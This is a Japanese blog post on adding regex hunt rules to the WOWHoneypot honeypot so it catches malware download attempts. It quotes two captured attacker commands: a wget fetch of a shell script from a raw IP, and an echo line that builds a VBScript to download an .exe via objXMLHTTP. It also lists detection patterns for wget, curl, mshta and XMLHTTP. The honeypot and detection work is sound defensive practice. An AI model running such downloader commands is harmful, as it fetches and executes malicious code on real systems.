WOWHoneypot Version 1.1が公開されました。
ハンティング機能が追加されましたが、少し設定を追加したいと思います。
GWが終わり、勉強の日々が始まる。

huntrules.txtの設定追加

正規表現で記載されています。
正規表現を知らないで見たら、呪文のようなコードです。
残念ながら、ここでは正規表現とは何ぞ?は解説しません。

wgetとcurl系

ファイル取得系を見ていると、以下のように「http://」を含めずにいらっしゃることがあります。
wget -O /tmp/.XO-lock 188.166.148.89:53/a.sh
この場合、huntrules.txtに記載されている正規表現では取得ができませんので、もう少しバッファ持たせて、以下の設定を追加しました。

追加設定.1
wget.+\d[\w/:\.\-]+
curl.+\d[\w/:\.\-]+

この場合、「User-Agent: curl/7.35.0」も該当しますが、そこは確認時に消すようにします。

mshta

トレンドマイクロの記事にあるように、mshtaはWindowsに標準搭載されている正規のシステムファイルで、指定のサイトへアクセスさせることが出来ます。
huntrules.txtに含まれていませんでしたので、これも追加します。

追加設定.2
mshta.+https?://[\w/:\.\-]+

XMLHTTP

MicrosoftのXML DOM(Document Object Model)コンポーネントスイートに、XMLHTTPオブジェクトがあります。参考
これを使い、ファイルを取得してくるパターンもありました。
echoでリダイレクトし、悪性ファイルを作成し、そのファイルをcscript.exe で実行させる。

こんなの.
echo objXMLHTTP.open "GET","http://198.50.179.109:8020/taskhostxz.exe",false >> C:/Windows/temp/getpocc.vbs
追加設定.3
objXMLHTTP.+https?://[\w/:\.\-]+

終わりに

もっといろんなパターンのファイル取得方法があると思います。
ハニーポッターの人、もっと教えて!

Sign up for free and join this conversation.
Sign Up
If you already have a Qiita account log in.